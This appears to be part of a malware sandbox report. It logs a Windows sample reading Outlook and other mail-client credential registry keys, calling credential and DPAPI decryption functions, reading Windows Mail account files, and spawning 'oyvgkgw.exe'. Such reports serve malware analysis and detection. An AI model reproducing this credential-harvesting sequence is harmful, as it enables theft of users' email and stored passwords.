Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\29091b5932ee0f48aec4673270b08577 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\29091b5932ee0f48aec4673270b08577 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\349c13b2d278c3458833b7862c0157f4 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\349c13b2d278c3458833b7862c0157f4 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\882b4247eb9feb478bcaf90664ec624c True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\882b4247eb9feb478bcaf90664ec624c False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 User, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Display Name, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Email, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Use SPA, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dfc6f427732b824da2ca53fc3cafb157 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dfc6f427732b824da2ca53fc3cafb157 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders, value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\IncrediMail\Identities False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Group Mail False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\MessengerService False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x777871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x7774b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x77787941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x77787381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x77787481 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x76295a7f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Yahoo\Pager False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x777871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x7774b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x77787941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x77787381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x77787481 True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, size = 1506, size_out = 1506 True 1
Fn
Data
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, size = 670, size_out = 670 True 1
Fn
Data
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, size = 1734, size_out = 1734 True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail False 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 6 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 30 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 15 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 4 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 0 True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 2 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 4 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 6 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 0 True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 7 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 0 True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 4 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 0 True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 2 True 1
Fn
Data
Process #9: oyvgkgw.exe
1285 0
»
Information Value
ID #9
File Name c:\programdata\oyvgkgw.exe
Command Line "C:\ProgramData\oyvGkGw.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
»
Information Value
PID 0x64
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 89C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000a0000 0x00106fff Memory Mapped File Readable False False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00120000 0x0015bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00126fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00141fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000190000 0x00190000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x0022ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x003b7fff Pagefile Backed Memory Readable True False False -
oyvgkgw.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
private_0x000000000cac0000 0x0cac0000 0x0cb7ffff Private Memory Readable, Writable True False False -
~dfa84a14a0862f3f78.tmp 0x0cac0000 0x0cb3ffff Memory Mapped File Readable, Writable True True False
private_0x000000000cb70000 0x0cb70000 0x0cb7ffff Private Memory Readable, Writable True False False -
private_0x000000000cbd0000 0x0cbd0000 0x0cccffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ccd0000 0x0ccd0000 0x0ce50fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce60000 0x0ce60000 0x0e25ffff Pagefile Backed Memory Readable True False False -
private_0x000000000e260000 0x0e260000 0x0e65ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e660000 0x0e92efff Memory Mapped File Readable False False False -
private_0x000000000e930000 0x0e930000 0x0ea6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e930000 0x0e930000 0x0ea0efff Pagefile Backed Memory Readable True False False -
private_0x000000000ea30000 0x0ea30000 0x0ea6ffff Private Memory Readable, Writable True False False -
private_0x000000000ea70000 0x0ea70000 0x0eb9ffff Private Memory Readable, Writable True False False -
private_0x000000000ea70000 0x0ea70000 0x0eaeffff Private Memory Readable, Writable True False False -
private_0x000000000eb60000 0x0eb60000 0x0eb9ffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0edaffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0ed1ffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0ec9ffff Private Memory Readable, Writable True False False -
private_0x000000000ecd0000 0x0ecd0000 0x0ecdffff Private Memory Readable, Writable True False False -
private_0x000000000ed10000 0x0ed10000 0x0ed1ffff Private Memory Readable, Writable True False False -
private_0x000000000ed70000 0x0ed70000 0x0edaffff Private Memory Readable, Writable True False False -
pagefile_0x000000000edb0000 0x0edb0000 0x0f1affff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f1b0000 0x0f1b0000 0x0f5a2fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f5b0000 0x0fedffff Memory Mapped File Readable False False False -
private_0x000000000fee0000 0x0fee0000 0x100dffff Private Memory Readable, Writable True False False -
private_0x00000000100e0000 0x100e0000 0x104dffff Private Memory Readable, Writable True False False -
private_0x00000000104e0000 0x104e0000 0x10cdffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
